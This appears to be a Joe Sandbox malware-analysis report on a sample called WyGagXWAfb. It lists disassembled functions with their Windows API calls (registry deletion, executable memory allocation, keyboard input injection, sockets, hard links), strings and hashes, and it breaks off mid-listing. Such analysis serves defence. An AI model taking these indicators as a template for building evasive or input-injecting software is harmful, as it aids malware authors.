API String ID: 2574300362-3689287502
Opcode ID: f755c68c83139261f856771a365fd9caa7d85a0709a2deca46fc9902fdb7fa27
Instruction ID: 44653e961b9a58a3503a79b8fd93788939aca5f90e3190d9cb1debeb52cba8bb
Opcode Fuzzy Hash: f755c68c83139261f856771a365fd9caa7d85a0709a2deca46fc9902fdb7fa27
Instruction Fuzzy Hash: 07D01730610723CFDB209F35E90876676E8EF15362B21C8BED486E6260EB70D8C0CB91

Function 00B91072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B912C1), ref: 00B91080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B91092

Strings

RegDeleteKeyExW, xrefs: 00B9108C
advapi32.dll, xrefs: 00B9107B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: e3c0dd111698df68f0e0ead9458ae95c4e3c8698d7bddeb2030da0534b09470b
Instruction ID: 1c575c337c7f7c4bb4083eb758b7643282d034a106b754de6dec86dc120ed421
Opcode Fuzzy Hash: e3c0dd111698df68f0e0ead9458ae95c4e3c8698d7bddeb2030da0534b09470b
Instruction Fuzzy Hash: BCD01231510723CFD7205F35D919E2A76E4EF05362F118C7EA489DA160DB70C4C0C650

Function 00B893F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B89009,?,00B9F910), ref: 00B89403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B89415

Strings

kernel32.dll, xrefs: 00B893FE
GetModuleHandleExW, xrefs: 00B8940F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 62f907aee234353caef81ab8b643c96244fe54d0f850770f69a8ef8afa0957be
Instruction ID: 58b2b0a89910aec2b05716dbe4234031a40fa25fc36c4036bdfe830b65d69f7d
Opcode Fuzzy Hash: 62f907aee234353caef81ab8b643c96244fe54d0f850770f69a8ef8afa0957be
Instruction Fuzzy Hash: 96D01734610727CFDB20AF31DA4962776E5EF05361B19C8BFA486E6670EA70C880CB90

Function 00B51B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B51B42
__swprintf.LIBCMT ref: 00B51B73

Strings

%.3d, xrefs: 00B51B4D
WIN_XPe, xrefs: 00B51BB2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 2e77675dad15f4195340c4132c156707179645a6ab117ab029c6fb765f4882f8
Instruction ID: 34a54ba77dd6d3e54c61c1d5a9e5815f003c45357b3f4b0a637593366009fc3b
Opcode Fuzzy Hash: 2e77675dad15f4195340c4132c156707179645a6ab117ab029c6fb765f4882f8
Instruction Fuzzy Hash: 12D0ECA1804118EACB049A948984BFA77FCA704312F5009D2B90292050F2649B999B21

Function 00B676C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcf4fd9a7702e4906c42eb8985e575fb9be766fa83a2a3d8a7ffec5a0a4f12a
Instruction ID: fadf7f6c8a70af0a755bb08f01b8769a1e341261d5460f8205c7bb8fcb23981b
Opcode Fuzzy Hash: dbcf4fd9a7702e4906c42eb8985e575fb9be766fa83a2a3d8a7ffec5a0a4f12a
Instruction Fuzzy Hash: EFC13975A44216EFCB14CFA4C884AAEB7F5FF48718B1185D9E805EB251DB34EE81CB90

Function 00B8E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B8E3D2
CharLowerBuffW.USER32(?,?), ref: 00B8E415

Part of subcall function 00B8DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B8DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B8E615
_memmove.LIBCMT ref: 00B8E628

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: caa4aa6100b8c2fa9622602164fe2094b7252b8a9a039e6a0c7012e6c687c1f6
Instruction ID: 4532ddde77c26a0473305f1c5ccedce30b38f51523934bc4c8bb29eeb576d700
Opcode Fuzzy Hash: caa4aa6100b8c2fa9622602164fe2094b7252b8a9a039e6a0c7012e6c687c1f6
Instruction Fuzzy Hash: BAC15C716083019FC714EF28C49096ABBE4FF88718F1489ADF8A99B361D731E945CF82

Function 00B883A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B883D8
CoUninitialize.OLE32 ref: 00B883E3

Part of subcall function 00B6DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6DAC5

VariantInit.OLEAUT32(?), ref: 00B883EE
VariantClear.OLEAUT32(?), ref: 00B886BF

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 06601a90a3a453107b6066925470818fafacf1399e915939fabb0eaefa0500ee
Instruction ID: 0ad671b877e5ae183ff25ba6e80701f92c69e8393b5696bd18b37e16a93d25af
Opcode Fuzzy Hash: 06601a90a3a453107b6066925470818fafacf1399e915939fabb0eaefa0500ee
Instruction Fuzzy Hash: BCA139752047419FCB10EF14C891B6AB7E5FF88354F548499F99A9B3A2DB30ED44CB82

Function 00B67A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BA2C7C,?), ref: 00B67C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BA2C7C,?), ref: 00B67C4A
CLSIDFromProgID.OLE32(?,?,00000000,00B9FB80,000000FF,?,00000000,00000800,00000000,?,00BA2C7C,?), ref: 00B67C6F
_memcmp.LIBCMT ref: 00B67C90

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: a205bb8cf2aaace6a4b364b7390edf391a7fb43ec7612b9bd7c22017331dbae1
Instruction ID: dce85b6fd3eabf2f6497f1698ae12ae790624ed0c98568af330aef21e8a26b24
Opcode Fuzzy Hash: a205bb8cf2aaace6a4b364b7390edf391a7fb43ec7612b9bd7c22017331dbae1
Instruction Fuzzy Hash: 26810A71A00109EFCB04DF94C994EEEB7F9FF89315F244198E506AB250DB75AE46CB60

Function 00B66DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B66E04
SysAllocString.OLEAUT32(00000000), ref: 00B66EAD
VariantCopy.OLEAUT32 ref: 00B66EDC
VariantClear.OLEAUT32(?), ref: 00B66F03

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 1e200142b0b784d8d050322492de0cf76efd02dacbb70c5ba92be604ac68729a
Instruction ID: bc70aaf49ced1c5e9ee588514699b19d656c3bfe585d6a01830f49046e74bfdd
Opcode Fuzzy Hash: 1e200142b0b784d8d050322492de0cf76efd02dacbb70c5ba92be604ac68729a
Instruction Fuzzy Hash: AA51E9306583029ADB34AF65D8D1A7EB3E5EF48314F30889FE556CB291DF789C809B11

Function 00B99A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(010BF210,?), ref: 00B99AD2
ScreenToClient.USER32(00000002,00000002), ref: 00B99B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B99B72

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4b9e2a8d42ba701090d3fbede94613c065caceea8126e9098f6a03285ad72b07
Instruction ID: 8b9e638ca279b2321578eb2e6ef0a89571e59ecfac84f430370be08d05137a42
Opcode Fuzzy Hash: 4b9e2a8d42ba701090d3fbede94613c065caceea8126e9098f6a03285ad72b07
Instruction Fuzzy Hash: 78512C35A00209AFCF50DF68D980AAE7BF5FB55320F1481AEF9159B2A0D735AD81DB90

Function 00B86CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B86CE4
WSAGetLastError.WSOCK32(00000000), ref: 00B86CF4

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B86D58
WSAGetLastError.WSOCK32(00000000), ref: 00B86D64

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: f4dafe2a4984bf25eed3a2764c4e832eb7cd84545d51c629d57eb8a90c14239f
Instruction ID: dc9d67f453a29a15b959615ea2a7b0fa54063f570deec0d719f8d89f0377d85d
Opcode Fuzzy Hash: f4dafe2a4984bf25eed3a2764c4e832eb7cd84545d51c629d57eb8a90c14239f
Instruction Fuzzy Hash: 5A41B475740200AFEB20BF24DC96F7A77E5EF04B10F8480A8FA59DB2D2DA749C408791

Function 00B8672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B9F910), ref: 00B867BA
_strlen.LIBCMT ref: 00B867EC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 8c36afb8e82771e67c14f90c0477ace264ddeaa6f1c51522c21aad623fe0fe8d
Instruction ID: efe7bffb7b63e3fe2f1c8f95883bc0893e237a18cac54a9858a6ca22990d8294
Opcode Fuzzy Hash: 8c36afb8e82771e67c14f90c0477ace264ddeaa6f1c51522c21aad623fe0fe8d
Instruction Fuzzy Hash: 99416235A00105ABCB14FBA4DDD5EEEB7E9EF48314F5481E6F81A972A1DB30AD40C791

Function 00B7BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B7BB09
GetLastError.KERNEL32(?,00000000), ref: 00B7BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B7BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B7BB80

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c95b34c8ac734974af784e3f5ede44da6ce407108774ba4a036850a1ba19a94e
Instruction ID: 7512315bccec33be57cf3ba540eb5c6e0958a62fc1b972d08aee7268bc043798
Opcode Fuzzy Hash: c95b34c8ac734974af784e3f5ede44da6ce407108774ba4a036850a1ba19a94e
Instruction Fuzzy Hash: E6411239600651DFCB11EF14C594A9DBBE1EF89320B0984D8F85AAB366CB34ED41CB91

Function 00B98AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B98B4D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: fbacb20e6660fc55e3c8afd926d0558b7d49f698dea302d4a3cf340d538dbefd
Instruction ID: 747c33ff867a50ff39524af96f8594f5571ad23dc4ce8cf79e538ca1cfb6bb04
Opcode Fuzzy Hash: fbacb20e6660fc55e3c8afd926d0558b7d49f698dea302d4a3cf340d538dbefd
Instruction Fuzzy Hash: 5531D2B4600204BFEF209B18CC95FA93BE5EB07320F6845B6FA55D72A1DE32A940D791

Function 00B9ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B9AE1A
GetWindowRect.USER32(?,?), ref: 00B9AE90
PtInRect.USER32(?,?,00B9C304), ref: 00B9AEA0
MessageBeep.USER32(00000000), ref: 00B9AF11

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 09807acb1790ceee0d2ce7eeb87ce75f8cb8f0e3102f541a8fd1718bcca2503d
Instruction ID: 9c485b3265b9174c53dccc105ee09d2394a84fdc7e0ee9b39f70bb2b598fd972
Opcode Fuzzy Hash: 09807acb1790ceee0d2ce7eeb87ce75f8cb8f0e3102f541a8fd1718bcca2503d
Instruction Fuzzy Hash: D9418C70600619DFCF11CF58C884B69BBF5FB49350F2881FAE818DB251DB31A941DBA2

Function 00B70FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B71037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00B71053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B710B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B7110B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5f20b576025c4d2d88731f2bf10dc741d50d496fb05b7f90d5de654379424851
Instruction ID: fe82fdae623025fe95f43ae0921d8e69afa1abd0e626d098ccaa913ea5406960
Opcode Fuzzy Hash: 5f20b576025c4d2d88731f2bf10dc741d50d496fb05b7f90d5de654379424851
Instruction Fuzzy Hash: 3D313930E44688AEFB308A6D8C05BF9BBE9EB44320F14C69BE5A8921D1C37449C49771

Function 00B71121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B71176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B71192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B711F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B71243

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f06219d619b4a3d787e1d536febeded615328c9c54ad545aab160ae2b1e123b5
Instruction ID: f386446d0bf16d043c2c7098b5a8a5524863cd5cbeddf0c34618c6296ecfc7a1
Opcode Fuzzy Hash: f06219d619b4a3d787e1d536febeded615328c9c54ad545aab160ae2b1e123b5
Instruction Fuzzy Hash: 563139309402089EEF208A6D8804BFA7BFAEB45320F54CB9BE5A8A65D1C3344D549771

Function 00B46415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B4644B
__isleadbyte_l.LIBCMT ref: 00B46479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B464A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B464DD

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1bc87f43b5ed52d8469c3ea5934398465a15020e7b0231fda3e6236216c59bf7
Instruction ID: 703341fdbf475e04e62ce9ebc4bb22316f21a1838172e5ae515aa14605cdf4ef
Opcode Fuzzy Hash: 1bc87f43b5ed52d8469c3ea5934398465a15020e7b0231fda3e6236216c59bf7
Instruction Fuzzy Hash: 0331E131600256EFDF258F64C844BBA7BE5FF42320F1540A9F85487290EB31DE90EB92

Function 00B95175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B95189

Part of subcall function 00B7387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B73897
Part of subcall function 00B7387D: GetCurrentThreadId.KERNEL32 ref: 00B7389E
Part of subcall function 00B7387D: AttachThreadInput.USER32(00000000,?,00B752A7), ref: 00B738A5

GetCaretPos.USER32(?), ref: 00B9519A
ClientToScreen.USER32(00000000,?), ref: 00B951D5
GetForegroundWindow.USER32 ref: 00B951DB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
